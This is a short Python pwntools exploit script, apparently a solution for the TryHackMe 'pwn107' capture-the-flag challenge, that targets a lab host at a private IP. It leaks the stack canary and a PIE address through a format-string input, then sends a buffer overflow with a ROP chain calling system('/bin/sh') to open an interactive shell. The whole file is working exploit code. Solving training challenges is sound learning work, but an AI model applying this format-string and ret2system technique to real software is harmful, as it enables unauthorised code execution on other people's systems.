ctfs/thm_pwn101/pwn107/a.py

#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn107", checksec=False)
# r = process()
r = remote("10.10.74.244", 9007)

# funcs
s = lambda a: r.sendafter(b"? ", a)
ss = lambda a: r.send(a)

# leak
s(b"%13$p.%19$p")
r.recvuntil(b": ")
leaks = r.recvlineS().strip().split(".")
canary = int(leaks[0], 16)
log.info("canary: %#x", canary)
target.address = int(leaks[1][:14], 16) - 0x992
log.info("pie: %#x", target.address)
system = target.sym.system
sh = next(target.search(b"/bin/sh\0"))

# gadgets
pop_rdi = target.address + 0x0af3

# pop
buf = b"A"*24
buf += p64(canary)
buf += b"A"*8
buf += p64(pop_rdi)
buf += p64(sh)
buf += p64(pop_rdi+1)
buf += p64(system)
ss(buf)

r.interactive()